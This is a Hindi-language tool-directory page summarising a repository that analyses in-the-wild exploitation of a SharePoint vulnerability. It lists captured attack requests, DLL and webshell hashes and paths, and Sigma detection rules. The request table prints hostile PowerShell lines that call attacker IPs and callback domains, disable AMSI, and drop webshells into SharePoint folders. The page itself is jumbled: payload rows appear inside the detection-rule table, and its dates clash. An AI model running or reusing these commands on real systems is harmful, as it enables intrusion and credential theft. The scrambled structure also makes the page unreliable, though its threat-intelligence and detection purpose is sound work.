Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/darses/cve-2026-50522
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubdarses/cve-2026-50522

CVE-2026-50522

माइक्रोसॉफ्ट शेयरपॉइंट CVE-2026-50522

रिपॉजिटरी देखें
31 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-50522

Microsoft SharePoint CVE-2026-50522 पेलोड और विश्लेषण।

HTTP अनुरोध

requestsrcuser-agentencodingunique idpayload
81697888245.63.58.216Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'urn:unique-id:securitycontext:b764f8e60e90450b8629b5ce74fccf82powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/b764f8e60e90450b8629b5ce74fccf82'
818198798146.19.216.119Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158'urn:unique-id:securitycontext:2965f1ebb795466c82f01142ca764efaMain.dll
819557248Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"urn:unique-id:securitycontext:8e1a54521f004b19880a4823bcdd3a94ayhmu2nq.dll
819736316165.154.199.52Mozilla/5.0'urn:uid:f7e4a5a8041648ef88f4befd099b1c61eze1fcmh.dll
82202661089.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:77b2293ba0f5464db990f3d2ae402698ActivitySurrogateDisableTypeCheck
82202661689.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:401e5797f3864092a836f92976a6506fedm3ysnc.dll
822486322199.91.221.39Mozilla/5.0 (compatible; SPOOB/1.0)"urn:unique-id:securitycontext:0e5062c6139e48e3bd951e88b3165a48opctzxj4.dll
822730890199.91.221.39Mozilla/5.0 (compatible; SPMKScan/1.1)"urn:unique-id:securitycontext:64ca3f7733c04b8cbcd859e1c08ebb54ko5ybodq.dll
823155656175.137.255.204Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:6ae69a0ebb7c4b66b7e8cc6f232a7ce3powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://d9k41hj3d47lhf7hbhlg6enhdi7tqb3uk.oast.me/206.255.76.17'
823277752103.151.172.73Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"urn:unique-id:securitycontext:ed252fcd4481466d9f70d3a693a9d073nslookup 9ac2293c.log.dnslog.pp.ua
82345241438.175.103.78Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"urn:unique-id:securitycontext:50fe1b81594845f293362037b3b4b32d`powershell.exe -NoProfile -NonInteractive -Command $ErrorActionPreference='SilentlyContinue';$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if($a){$f=$a.GetField('amsiInitFailed','NonPublic,Static');if($f){$f.SetValue($null,$true)}};$c=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[SNIP ERROR.aspx webshell'));$dirs=@('C:\inetpub\wwwroot\wss\VirtualDirectories','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS');foreach($d in $dirs){if(Test-Path $d){Get-ChildItem $d -Recurse -Directory -ErrorAction SilentlyContinue
824307296190.5.224.135Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:0584ba10642c43e2850bff4122a81514powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JABFAHIAcgBv[SNIP], `$ErrorActionPreference='SilentlyContinue';$ProgressPreference='SilentlyContinue';$webshellB64='[SNIP default_settings.aspx webshell]';$msg='NOPATH';$done=$false;@('16','15')

पेलोड

file namefile hash SHA-256creation time (UTC)notes
14e2gtsh.dll8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d2026-07-24 03:00:13MachineKeys लौटाता है
ayhmu2nq.dlledb087336f22a152d9023416b60ee74db2d30e5df52f2166f5dd1b4ae70aa2eb2026-07-24 01:47:55CompatibilityHttpsListener के साथ WinRM सक्षम करता है, उपयोगकर्ता sp_admin जोड़ता है और उसे स्थानीय समूह व्यवस्थापकों में जोड़ता है
b4tg4ktk.dll824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b99662026-07-23 07:53:59MachineKeys और स्थिति कोड 200 लौटाता है
bwd0vdqa.dllafce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb352026-07-23 02:54:54MachineKeys लौटाता है
edm3ysnc.dll91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb705492026-07-22 10:54:43MachineKeys लौटाता है
eze1fcmh.dll02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd2026-07-24 02:37:59वेबशेल/बैकडोर cmRANDOM.aspx लिखता है
hyyavam5.dll74c205b86a8c0884d968225e20db2624164021df14987bc7f602a9ed45ed6c8f2026-07-26 03:20:01
jflyahz3.dll352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be94591512026-07-23 07:15:43MachineKeys लौटाता है
ko5ybodq.dll249fea110682ff603bf24f9c1147eae73642b186c7a23022d5f824498b8fcd662026-07-27 14:41:06
Main.dll7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec952055-02-11 11:16:12MachineKeys लौटाता है। पेलोड पहले ToolShell अभियान के दौरान उपयोग किया गया था।
obdw11tn.dll2ed05c2ff5977047a5aa779510983f7f27b1fde8a0ce6ac8611341eea55f9e37

वेबशेल

file namefile hash SHA-256notes
cmRANDOM.aspx450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511वेबशेल "Helper Tool" और फ़ाइलनाम cm{RANDOM}.aspx। निष्पादित पेलोड Assembly.Load(assemblyBytes) का उपयोग करके मेमोरी में निष्पादित किए जाते हैं। फ़ाइलनाम यादृच्छिक किया जाता है।
default_settings.aspxf72a4d95b4c49bb9ffac869d2a30d829f2519d2f6a1a86bcea54dbeffc34f550वेबशेल स्थान TEMPLATE\LAYOUTS या \wss\VirtualDirectories\
error.aspx291dc1f15143c2c87fd2257b6145069914bdffa2f6be9afa63169f8661d9cc4bवेबशेल स्थान C:\inetpub\wwwroot\wss\VirtualDirectories, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS।
layout2sp.aspxd7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597वेबशेल स्थान \TEMPLATE\LAYOUTS\layout2sp.aspx।

पहचान

पहचान वास्तविक लॉग के साथ सत्यापित नहीं की गई थीं।

typerulenotes
SigmaDNS Query to External Service Interaction Domains.log.dnslog.pp.ua, .oast.me, .oastify.com जैसे कॉलबैक डोमेन के लिए आउटबाउंड DNS क्वेरी का पता लगाता है।
SigmaNew User Created Via Net.EXEnet.exe का उपयोग करके जोड़े गए नए उपयोगकर्ताओं का पता लगाता है।
SigmaPotential WMI Lateral Movement WmiPrvSE Spawned PowerShellWMI के माध्यम से पार्श्व गति का पता लगाता है।
SigmaSuspicious File Write to SharePoint Layouts DirectorySharePoint फ़ोल्डर \TEMPLATE\LAYOUTS\ में फ़ाइल लेखन का पता लगाता है।
SigmaSuspicious PowerShell Parent Processw3wp.exe द्वारा powershell.exe प्रक्रिया स्पॉन का पता लगाता है।
SigmaSuspicious Process By Web Server Processw3wp.exe से स्पॉन की गई संदिग्ध प्रक्रियाओं का पता लगाता है।
SigmaSuspicious Processes Spawned by WinRMWinRM होस्ट प्रक्रिया से स्पॉन किए गए शेल सहित संदिग्ध प्रक्रियाओं का पता लगाता है।
SigmaWebshell Detection With Command Line Keywords
टूल डाउनलोड करें
2025-07-29 08:50:39
MachineKeys लौटाता है
opctzxj4.dllf5c8c39b29d061d72eaefcf1ff19511bdab5d4b3c9849df4ead07dbe61364ee22026-07-27 15:32:46
tyt0qmyy.dll46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d72026-07-20 08:55:23HTTP प्रतिक्रिया हेडर sec-ch-ua-mobile: ?1 लौटाता है
z1zkfu55.dllab2e01650b20787dd940475041f83f19c4e025988fcf8aab443ca607003da0122026-07-26 04:49:55
gzlzbkhj.dll52f4af0401258daa9a278710145a9d0d67a35147f0ea136b88684362953489332026-07-25 14:08:17
qho14tqo.dll814db355b4a03fbd6fa138b37a04dd5ff24d9bc5d15e24474f149b220e9c60782026-07-23 06:58:36
वेब शेल के माध्यम से टोही गतिविधि के दौरान अक्सर उपयोग किए जाने वाले कुछ कमांड लाइन पैरामीटर का पता लगाता है।
SigmaWebshell Hacking Activity Patternsw3wp.exe से कुछ चाइल्ड प्रक्रियाओं का पता लगाता है